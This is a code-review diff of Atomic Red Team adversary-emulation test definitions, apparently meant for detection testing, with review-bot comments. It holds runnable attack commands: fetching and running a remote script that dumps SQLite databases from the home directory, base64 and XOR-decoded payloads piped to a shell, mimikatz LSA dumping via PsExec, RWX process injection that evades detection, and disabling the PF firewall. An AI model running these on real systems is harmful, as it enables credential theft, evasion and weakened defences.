+ "prereq_command": "if [ -x \"$(command -v sqlite3)\" ]; then echo \"sqlite3 is installed\"; else echo \"sqlite3 is NOT installed\"; exit 1; fi\nif [ -x \"$(command -v curl)\" ]; then echo \"curl is installed\"; else echo \"curl is NOT installed\"; exit 1; fi\nif [ -x \"$(command -v strings)\" ]; then echo \"strings is installed\"; else echo \"strings is NOT installed\"; exit 1; fi\n",
+ "get_prereq_command": "if grep -iq \"debian\\|ubuntu\\|kali\\|mint\" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi\nif grep -iq \"rhel\\|fedora\\|centos\" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi\n"
+ }
+ ],
+ "executor": {
+ "name": "bash",
+ "elevation_required": false,
+ "command": "cd $HOME\ncurl -O #{remote_url}/art\ncurl -O #{remote_url}/gta.db\ncurl -O #{remote_url}/sqlite_dump.sh\nchmod +x sqlite_dump.sh\nfind . ! -executable -exec bash -c 'if [[ \"$(head -c 15 {} | strings)\" == \"SQLite format 3\" ]]; then echo \"{}\"; ./sqlite_dump.sh {}; fi' \\;\n",
+ "cleanup_command": "rm -f $HOME/.art\nrm -f $HOME/gta.db\nrm -f $HOME/sqlite_dump.sh \n"
+ }
 }
 ]
 }
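Review bot: `cleanup_command` removes `$HOME/.art`, but the executor fetches `#{remote_url}/art` with `curl -O`, which saves it as `$HOME/art`, so that file is left behind after cleanup; the line should read `rm -f $HOME/art`. The dependency description "Check if running on a Debian based machine." does not describe `prereq_command`, which checks for `sqlite3`, `curl` and `strings`; `sqlite3, curl and strings must be installed` matches the code, and it is `get_prereq_command` that branches on the distro. Since `find .` runs from `$HOME`, every non-executable file under the home directory is read and any SQLite database found is dumped to stdout, which the description should state so the scope is clear before running.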
@@ -235623,6 +236495,8 @@ "ENCODED=$(python3 -c 'import base64;enc=base64.b64encode(\"Hello from Atomic Red Team test T1140!\".encode());print(enc.decode())')\npython3 -c \"import base64;dec=base64.b64decode(\\\"$ENCODED\\\");print(dec.decode())\"\npython3 -c \"import base64 as d;dec=d.b64decode(\\\"$ENCODED\\\");print(dec.decode())\"\npython3 -c \"from base64 import b64decode;dec=b64decode(\\\"$ENCODED\\\");print(dec.decode())\"\npython3 -c \"from base64 import b64decode as d;dec=d(\\\"$ENCODED\\\");print(dec.decode())\"\necho $ENCODED | python3 -c \"import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())\"\necho $ENCODED > /tmp/T1140.encoded && python3 -c \"import base64;dec=base64.b64decode(open('/tmp/T1140.encoded').read());print(dec.decode())\"\n", "ENCODED=$(perl -e \"use MIME::Base64;print(encode_base64('Hello from Atomic Red Team test T1140!'));\")\nperl -le \"use MIME::Base64;print(decode_base64('$ENCODED'));\"\necho $ENCODED | perl -le 'use MIME::Base64;print(decode_base64());'\necho $ENCODED > /tmp/T1140.encoded && perl -le 'use MIME::Base64;open($f,\"<\",\"/tmp/T1140.encoded\");print(decode_base64(<$f>));'\n", "ENCODED=$(echo 'Hello from Atomic Red Team test T1140!' | base64)\nprintf $ENCODED | base64 -d\necho $ENCODED | base64 -d\necho $(echo $ENCODED) | base64 -d\necho $ENCODED > /tmp/T1140.encoded && base64 -d /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && base64 -d < /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && cat /tmp/T1140.encoded | base64 -d\necho $ENCODED > /tmp/T1140.encoded && cat < /tmp/T1140.encoded | base64 -d\nbash -c \"{echo,\\\"$(echo $ENCODED)\\\"}|{base64,-d}\"\n", + "ENCODED=$(echo 'Hello from Atomic Red Team test T1140!' 
| b64encode -r -)\nprintf $ENCODED | b64decode -r\necho $ENCODED | b64decode -r\necho $(echo $ENCODED) | b64decode -r\necho $ENCODED > /tmp/T1140.encoded && b64encode -r /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && b64decode -r < /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && cat /tmp/T1140.encoded | b64decode -r\necho $ENCODED > /tmp/T1140.encoded && cat < /tmp/T1140.encoded | b64decode -r\n", + "echo IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | b64decode -r | sh\necho IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | b64decode -r | sh\necho IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | b64decode -r | sh\necho IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK | b64decode -r | sh\n", "ENCODED=$(echo 'Hello from Atomic Red Team test T1140!' | xxd -ps -c 256)\nprintf $ENCODED | xxd -r -p\necho $ENCODED | xxd -r -p\necho $(echo $ENCODED) | xxd -r -p\necho $ENCODED > /tmp/T1140.encoded && xxd -r -p /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && xxd -r -p < /tmp/T1140.encoded\necho $ENCODED > /tmp/T1140.encoded && cat /tmp/T1140.encoded | xxd -r -p\necho $ENCODED > /tmp/T1140.encoded && cat < /tmp/T1140.encoded | xxd -r -p\n", "echo IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | base64 -d | bash\necho IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | base64 -d | bash\necho IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo= | base64 -d | bash\necho IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK | base64 -d | bash\n", "python3 -c 'import base64; import subprocess; xor_decrypt = lambda text, key: \"\".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), key)]); command = \"AAkqKQEM\"; key = 
\"waEHleblxiQjoxFJQaIMLdHKz\"; exec = xor_decrypt(command, key); subprocess.call(exec, shell=True)'", @@ -235990,7 +236864,7 @@ { "name": "Base64 decoding with Perl", "auto_generated_guid": "6604d964-b9f6-4d4b-8ce8-499829a14d0a", - "description": "Use Perl to decode a base64-encoded text string and echo it to the console\n", + "description": "Use Perl to decode a base64-encoded text string and echo it to the console \n", "supported_platforms": [ "linux", "macos" 
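Review bot: In the added FreeBSD base64 command the fourth variant, `echo $ENCODED > /tmp/T1140.encoded && b64encode -r /tmp/T1140.encoded`, encodes the file instead of decoding it, unlike its `base64 -d /tmp/T1140.encoded` counterpart above; it should be `b64decode -r /tmp/T1140.encoded`, assuming `b64decode` takes a file operand, which is worth confirming. In the added shebang command the second and third `echo ... | b64decode -r | sh` lines are byte-identical, so the fish case re-runs the dash payload, mirroring the duplication already present in the `base64 -d | bash` line below it. Both strings are repeated in the test definitions in the hunk at `@@ -236046`, where `fish_encoded` has the same default as `dash_encoded`; fix them there and regenerate this list.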
@@ -236046,6 +236920,73 @@ "command": "ENCODED=$(echo '#{message}' | base64)\nprintf $ENCODED | base64 -d\necho $ENCODED | base64 -d\necho $(echo $ENCODED) | base64 -d\necho $ENCODED > #{encoded_file} && base64 -d #{encoded_file}\necho $ENCODED > #{encoded_file} && base64 -d < #{encoded_file}\necho $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d\necho $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d\nbash -c \"{echo,\\\"$(echo $ENCODED)\\\"}|{base64,-d}\"\n" } }, + { + "name": "Base64 decoding with shell utilities (freebsd)", + "auto_generated_guid": "b6097712-c42e-4174-b8f2-4b1e1a5bbb3d", + "description": "Use common shell utilities to decode a base64-encoded text string and echo it to the console\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "message": { + "description": "Message to print to the screen", + "type": "string", + "default": "Hello from Atomic Red Team test T1140!" + }, + "encoded_file": { + "description": "File to temporarily save encoded text", + "type": "path", + "default": "/tmp/T1140.encoded" + } + }, + "executor": { + "name": "sh", + "elevation_required": false, + "command": "ENCODED=$(echo '#{message}' | b64encode -r -)\nprintf $ENCODED | b64decode -r\necho $ENCODED | b64decode -r\necho $(echo $ENCODED) | b64decode -r\necho $ENCODED > #{encoded_file} && b64encode -r #{encoded_file}\necho $ENCODED > #{encoded_file} && b64decode -r < #{encoded_file}\necho $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r\necho $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r\n" + } + }, + { + "name": "FreeBSD b64encode Shebang in CLI", + "auto_generated_guid": "18ee2002-66e8-4518-87c5-c0ec9c8299ac", + "description": "Using b64decode shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. 
Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. \n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "bash_encoded": { + "description": "Encoded", + "type": "string", + "default": "IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=" + }, + "dash_encoded": { + "description": "Encoded", + "type": "string", + "default": "IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=" + }, + "fish_encoded": { + "description": "Encoded", + "type": "string", + "default": "IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=" + }, + "sh_encoded": { + "description": "Encoded", + "type": "string", + "default": "IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK" + } + }, + "dependencies": [ + { + "description": "b64decode must be present\n", + "prereq_command": "which b64decode\n", + "get_prereq_command": "echo \"please install b64decode\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "echo #{bash_encoded} | b64decode -r | sh\necho #{dash_encoded} | b64decode -r | sh\necho #{fish_encoded} | b64decode -r | sh\necho #{sh_encoded} | b64decode -r | sh\n" + } + }, { "name": "Hex decoding with shell utilities", "auto_generated_guid": "005943f9-8dd5-4349-8b46-0313c0a9f973", 
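Review bot: The second test is named "FreeBSD b64encode Shebang in CLI" but its executor only calls `b64decode`, and all four `input_arguments` are described as just `Encoded`, which tells a user nothing about what they hold; describe each as e.g. `Base64 of a one-line script whose shebang is /bin/dash`. The description sentence `Also a there is a great Sigma rule` has a stray word. `get_prereq_command` is `echo "please install b64decode"`, which exits 0 without installing anything; that is fine only if the runner re-evaluates `prereq_command` afterwards, otherwise the dependency should state that it cannot be auto-satisfied.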
@@ -260307,7 +261248,7 @@ "display_name": "Archive Collected Data: Archive via Library", "atomic_tests": [ { - "name": "Compressing data using GZip in Python (Linux)", + "name": "Compressing data using GZip in Python (FreeBSD/Linux)", "auto_generated_guid": "391f5298-b12d-4636-8482-35d9c17d53a8", "description": "Uses GZip from Python to compress files\n", "supported_platforms": [ @@ -260325,7 +261266,7 @@ "default": "/tmp/passwd.gz" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "Requires Python\n", @@ -260334,14 +261275,14 @@ } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "which_python=`which python || which python3`\n$which_python -c \"import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb',compresslevel=6);output_file.write(content);output_file.close();\"\n", "cleanup_command": "rm #{path_to_output_file}\n" } }, { - "name": "Compressing data using bz2 in Python (Linux)", + "name": "Compressing data using bz2 in Python (FreeBSD/Linux)", "auto_generated_guid": "c75612b2-9de0-4d7c-879c-10d7b077072d", "description": "Uses bz2 from Python to compress files\n", "supported_platforms": [ @@ -260359,7 +261300,7 @@ "default": "/tmp/passwd.bz2" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "Requires Python\n", 
@@ -260368,14 +261309,14 @@ } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "which_python=`which python || which python3`\n$which_python -c \"import bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(str(bz2content));output_file.close();\"\n", "cleanup_command": "rm #{path_to_output_file}\n" } }, { - "name": "Compressing data using zipfile in Python (Linux)", + "name": "Compressing data using zipfile in Python (FreeBSD/Linux)", "auto_generated_guid": "001a042b-859f-44d9-bf81-fd1c4e2200b0", "description": "Uses zipfile from Python to compress files\n", "supported_platforms": [ @@ -260393,7 +261334,7 @@ "default": "/tmp/passwd.zip" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "Requires Python\n", @@ -260402,14 +261343,14 @@ } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "which_python=`which python || which python3`\n$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\"\n", "cleanup_command": "rm #{path_to_output_file}\n" } }, { - "name": "Compressing data using tarfile in Python (Linux)", + "name": "Compressing data using tarfile in Python (FreeBSD/Linux)", "auto_generated_guid": "e86f1b4b-fcc1-4a2a-ae10-b49da01458db", "description": "Uses tarfile from Python to compress files\n", "supported_platforms": [ @@ -260427,7 +261368,7 @@ "default": "/tmp/passwd.tar.gz" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "Requires Python\n", 
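Review bot: In the bz2 test, the context line `output_file=open('#{path_to_output_file}','w+');output_file.write(str(bz2content))` writes the Python repr of the bytes object (text starting with `b'`) rather than the bz2 stream, so the produced file is not a valid archive; this predates the commit, but the rename to FreeBSD/Linux is a good moment to change it to `output_file=open('#{path_to_output_file}','wb');output_file.write(bz2content)`. The `supported_platforms` arrays of these renamed tests lie outside the hunks, so whether they list anything besides linux cannot be checked here.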
@@ -260436,7 +261377,7 @@ } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "which_python=`which python || which python3`\n$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\" \n", "cleanup_command": "rm #{path_to_output_file}\n" @@ -269295,6 +270236,7 @@ "\"\\..\\ExternalPayloads\\PsExec.exe\" /accepteula \\\\DC1 -c %tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::lsa /inject /id:500\" \"exit\"\n", "$notepad = Start-Process notepad -passthru\nStart-Process \"$PathToAtomicsFolder\\T1055\\bin\\x64\\InjectView.exe\"\n", "Start-Process \"\\T1055\\bin\\x64\\redVanity.exe\" (Start-Process calc.exe -PassThru).Id\n", + "$address = (& \"\\T1055\\bin\\x64\\searchVuln.exe\" \"\\T1055\\bin\\x64\\vuln_dll\\\" | Out-String | Select-String -Pattern \"VirtualAddress: (\\w+)\").Matches.Groups[1].Value\n& \"\\T1055\\bin\\x64\\RWXinjectionLocal.exe\" \"\\T1055\\bin\\x64\\vuln_dll\\msys-2.0.dll\" $address\n", "powershell/code_execution/invoke_dllinjection", "powershell/code_execution/invoke_reflectivepeinjection", "powershell/code_execution/invoke_shellcode", 
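Review bot: The executor of the "Compressing data using tarfile in Python (FreeBSD/Linux)" test runs `$which_python -c "from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')"`, which is the zipfile test's command again, so despite the name and the `/tmp/passwd.tar.gz` default no tarfile code is exercised. A one-liner such as `$which_python -c "import tarfile; t=tarfile.open('#{path_to_output_file}','w:gz'); t.add('#{path_to_input_file}'); t.close()"` would match the description. The test's `name` line is in the last hunk of the previous line and its `supported_platforms` array is outside both hunks.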
@@ -270093,6 +271035,35 @@ "name": "powershell", "elevation_required": false } + }, + { + "name": "Read-Write-Execute process Injection", + "auto_generated_guid": "49543237-25db-497b-90df-d0a0a6e8fe2c", + "description": "This test exploited the vulnerability in legitimate PE formats where sections have RWX permission and enough space for shellcode.\nThe RWX injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory, thus evading detection mechanisms \nthat relied on API call sequences and heuristics. The RWX injection utilises API call sequences: LoadLibrary --> GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.\nThe injected shellcode will open a message box and a notepad.\nRWX Process Injection, also known as MockingJay, was introduced to the security community by SecurityJoes.\nMore details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.\nThe original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vuln_dll": { + "description": "vulnerable DLL", + "type": "path", + "default": "PathToAtomicsFolder\\T1055\\bin\\x64\\vuln_dll\\msys-2.0.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Utility to inject must exist on disk at specified location (#{vuln_dll})\n", + "prereq_command": "if (Test-Path \"#{vuln_dll}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{vuln_dll}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll\" -OutFile \"#{vuln_dll}\"\n" + } + ], + "executor": { + "command": "$address = (& \"$PathToAtomicsFolder\\T1055\\bin\\x64\\searchVuln.exe\" \"$PathToAtomicsFolder\\T1055\\bin\\x64\\vuln_dll\\\" 
| Out-String | Select-String -Pattern \"VirtualAddress: (\\w+)\").Matches.Groups[1].Value\n& \"PathToAtomicsFolder\\T1055\\bin\\x64\\RWXinjectionLocal.exe\" \"#{vuln_dll}\" $address\n", + "cleanup_command": "Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", + "name": "powershell", + "elevation_required": true + } } ] } @@ -276192,6 +277163,14 @@ "default": "c:\\windows\\system32\\ie4uinit.exe" } }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ieuinit.inf must exist on disk at specified location (#{Path_inf})\n", + "prereq_command": "if (Test-Path \"#{Path_inf}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{Path_inf}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/ieuinit.inf\" -OutFile \"#{Path_inf}\"\n" + } + ], "executor": { "command": "copy #{Path_ie4uinit} %TEMP%\\ie4uinit.exe\ncopy \"#{Path_inf}\" %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", "cleanup_command": "del %TEMP%\\ie4uinit.exe >nul 2>&1\ndel %TEMP%\\ieuinit.inf >nul 2>&1\n", @@ -284976,13 +285955,15 @@ "id": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "name": "Ignore Process Interrupts", "created": "2023-08-24T17:23:34.470Z", - "modified": "2023-09-06T20:17:26.167Z", + "modified": "2023-11-06T20:14:51.609Z", "type": "attack-pattern", "x_mitre_data_sources": [ "Process: Process Creation", "Command: Command Execution" ], - "x_mitre_contributors": [], + "x_mitre_contributors": [ + "Viren Chaudhari, Qualys" + ], "x_mitre_impact_type": [], "x_mitre_deprecated": false, "x_mitre_effective_permissions": [], 
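Review bot: In the executor, the second command `& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address` lacks the `$` that the first command uses in `$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe`; unless the runner substitutes both spellings inside commands, PowerShell treats it as a relative path and the call fails. The dependency only checks that `#{vuln_dll}` exists, while `searchVuln.exe` and `RWXinjectionLocal.exe` have no prerequisite, so a missing binary surfaces as a runtime error instead of a prereq failure. `cleanup_command` stops every `notepad` process on the host, not only the one the test spawned, which the description should say.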
@@ -284992,7 +285973,7 @@ "x_mitre_detection": "", "x_mitre_defense_bypassed": [], "x_mitre_system_requirements": [], - "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_attack_spec_version": "3.2.0", "revoked": false, "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -307420,9 +308401,11 @@ "netsh advfirewall firewall add rule name=\"Open Port to Any\" dir=in protocol=tcp localport=3389 action=allow profile=any", "Copy-Item \"\\T1562.004\\bin\\AtomicTest.exe\" -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", "ufw disable\n", + "service pf stop\nservice pf disable\n", "systemctl stop ufw\n", "ufw logging off\n", "ufw prepend deny from 1.2.3.4\nufw status numbered\n", + "echo \"block in proto tcp from 1.2.3.4 to any\" | pfctl -a pf-rules -f -\npfctl -a pf-rules -s rules\n", "echo \"# THIS IS A COMMENT\" >> /etc/ufw/user.rules\ngrep \"# THIS IS A COMMENT\" /etc/ufw/user.rules\n", "echo \"# THIS IS A COMMENT\" >> /etc/ufw/ufw.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/ufw.conf\n", "echo \"# THIS IS A COMMENT\" >> /etc/ufw/sysctl.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/sysctl.conf\n", 
@@ -307561,6 +308544,28 @@
 "cleanup_command": "ufw enable\nufw status verbose\n"
 }
 },
+ {
+ "name": "Stop/Start Packet Filter",
+ "auto_generated_guid": "0ca82ed1-0a94-4774-9a9a-a2c83a8022b7",
+ "description": "Stop the Packet Filter if installed.\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "dependency_executor_name": "sh",
+ "dependencies": [
+ {
+ "description": "Check if pfctl is installed on the machine.\n",
+ "prereq_command": "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n***** PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\" ]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n",
+ "get_prereq_command": "echo \"\"\n"
+ }
+ ],
+ "executor": {
+ "name": "sh",
+ "elevation_required": true,
+ "command": "service pf stop\nservice pf disable\n",
+ "cleanup_command": "service pf enable\nservice pf start\nservice pf status\n"
+ }
+ },
 {
 "name": "Stop/Start UFW firewall systemctl",
 "auto_generated_guid": "9fd99609-1854-4f3c-b47b-97d9a5972bd1",
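Review bot: `service pf disable` in the executor changes the host's boot configuration so PF stays off across reboots, not just for this run, and `cleanup_command` unconditionally runs `service pf enable`, so a host where PF was running but not enabled at boot ends up with a changed boot setting; the description "Stop the Packet Filter if installed." should mention the persistent change, or the test should capture the prior state before disabling. The `prereq_command` treats empty output from `kldstat -n pf` as "inactive", which may also be the result when pf is compiled into the kernel rather than loaded as a module; `kldstat -m pf` checks by module name and is worth confirming on the target release. That string also ends with a stray space before `\n`.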
@@ -307627,6 +308632,28 @@
 "cleanup_command": "{ echo y; echo response; } | ufw delete 1\nufw status numbered\n"
 }
 },
+ {
+ "name": "Add and delete Packet Filter rules",
+ "auto_generated_guid": "8b23cae1-66c1-41c5-b79d-e095b6098b5b",
+ "description": "Add and delete a rule on the Packet Filter (PF) if installed and enabled. \n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "dependency_executor_name": "sh",
+ "dependencies": [
+ {
+ "description": "Check if pf is installed on the machine and enabled.\n",
+ "prereq_command": "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n***** PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\" ]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n",
+ "get_prereq_command": "echo \"anchor pf-rules >> /etc/pf.conf\"\npfctl -f /etc/pf.conf\n"
+ }
+ ],
+ "executor": {
+ "name": "sh",
+ "elevation_required": true,
+ "command": "echo \"block in proto tcp from 1.2.3.4 to any\" | pfctl -a pf-rules -f -\npfctl -a pf-rules -s rules\n",
+ "cleanup_command": "pfctl -a pf-rules -F rules\nsed -i \"\" '/anchor pf-rules/d'\npfctl -f /etc/pf.conf\n"
+ }
+ },
 {
 "name": "Edit UFW firewall user.rules file",
 "auto_generated_guid": "beaf815a-c883-4194-97e9-fdbbb2bbdd7c",
@@ -331379,8 +332406,8 @@
 "auto_generated_guid": "ffe2346c-abd5-4b45-a713-bf5f1ebd573a",
 "description": "Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.\n\nUpon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.\n",
 "supported_platforms": [
- "macos",
- "linux"
+ "linux",
+ "macos"
 ],
 "input_arguments": {
 "file_to_pad": {
@@ -331389,7 +332416,7 @@
 "default": "/tmp/evil-binary"
 }
 },
- "dependency_executor_name": "bash",
+ "dependency_executor_name": "sh",
 "dependencies": [
 {
 "description": "The binary must exist on disk at specified location (#{file_to_pad})\n",
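Review bot: `get_prereq_command` is `echo "anchor pf-rules >> /etc/pf.conf"` — the redirection sits inside the quotes, so the anchor line is printed, never appended, and the following `pfctl -f /etc/pf.conf` reloads an unchanged file; it should be `echo "anchor pf-rules" >> /etc/pf.conf`. `cleanup_command` then runs `sed -i "" '/anchor pf-rules/d'` with no file operand, so sed waits on stdin and the anchor line (once it is actually written) is never removed; it needs `/etc/pf.conf` appended. The `prereq_command` is the same string as in the Stop/Start test above, trailing space included, so a fix there should be mirrored here.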
@@ -331408,8 +332435,8 @@ "auto_generated_guid": "e22a9e89-69c7-410f-a473-e6c212cd2292", "description": "Uses truncate to add a byte to the binary to change the hash.\n\nUpon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "file_to_pad": { @@ -331418,7 +332445,7 @@ "default": "/tmp/evil-binary" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "The binary must exist on disk at specified location (#{file_to_pad})\n", @@ -334489,6 +335516,7 @@ "find / -path \"*.mozilla/firefox/*/places.sqlite\" 2>/dev/null -exec echo {} >> /tmp/T1217-Firefox.txt \\;\ncat /tmp/T1217-Firefox.txt 2>/dev/null\n", "find / -path \"*/Firefox/Profiles/*/places.sqlite\" -exec echo {} >> /tmp/T1217_Firefox.txt \\;\ncat /tmp/T1217_Firefox.txt 2>/dev/null\n", "find / -path \"*/Google/Chrome/*/Bookmarks\" -exec echo {} >> /tmp/T1217-Chrome.txt \\;\ncat /tmp/T1217-Chrome.txt 2>/dev/null\n", + "find / -path \"*/.config/chromium/*/Bookmarks\" -exec echo {} >> /tmp/T1217-Chrome.txt \\;\ncat /tmp/T1217-Chrome.txt 2>/dev/null\n", "Get-ChildItem -Path C:\\Users\\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force\n", "where /R C:\\Users\\ Bookmarks\n", "where /R C:\\Users\\ places.sqlite\n", 
@@ -334512,9 +335540,9 @@
 "display_name": "Browser Bookmark Discovery",
 "atomic_tests": [
 {
- "name": "List Mozilla Firefox Bookmark Database Files on Linux",
+ "name": "List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux",
 "auto_generated_guid": "3a41f169-a5ab-407f-9269-abafdb5da6c2",
- "description": "Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file.\n",
+ "description": "Searches for Mozilla Firefox's places.sqlite file (on FreeBSD or Linux distributions) that contains bookmarks and lists any found instances to a text file.\n",
 "supported_platforms": [
 "linux"
 ],
@@ -334571,6 +335599,26 @@
 "name": "sh"
 }
 },
+ {
+ "name": "List Google Chromium Bookmark JSON Files on FreeBSD",
+ "auto_generated_guid": "88ca025b-3040-44eb-9168-bd8af22b82fa",
+ "description": "Searches for Google Chromium's Bookmark file (on FreeBSD) that contains bookmarks in JSON format and lists any found instances to a text file.\n",
+ "supported_platforms": [
+ "linux"
+ ],
+ "input_arguments": {
+ "output_file": {
+ "description": "Path where captured results will be placed.",
+ "type": "path",
+ "default": "/tmp/T1217-Chrome.txt"
+ }
+ },
+ "executor": {
+ "command": "find / -path \"*/.config/chromium/*/Bookmarks\" -exec echo {} >> #{output_file} \\;\ncat #{output_file} 2>/dev/null\n",
+ "cleanup_command": "rm -f #{output_file} 2>/dev/null\n",
+ "name": "sh"
+ }
+ },
 {
 "name": "List Google Chrome / Opera Bookmarks on Windows with powershell",
 "auto_generated_guid": "faab755e-4299-48ec-8202-fc7885eb6545",
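Review bot: The new `find / -path "*/.config/chromium/*/Bookmarks" -exec echo {} >> #{output_file} \;` has no `2>/dev/null`, unlike the Firefox test's `find ... 2>/dev/null` in the preceding hunk on the previous line, so every unreadable directory under `/` prints a permission error to the console. `~/.config/chromium` is also where Chromium keeps its profile on Linux, so "on FreeBSD" in the name and description is narrower than what the command finds; "on FreeBSD/Linux" would match the `linux` platform tag.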
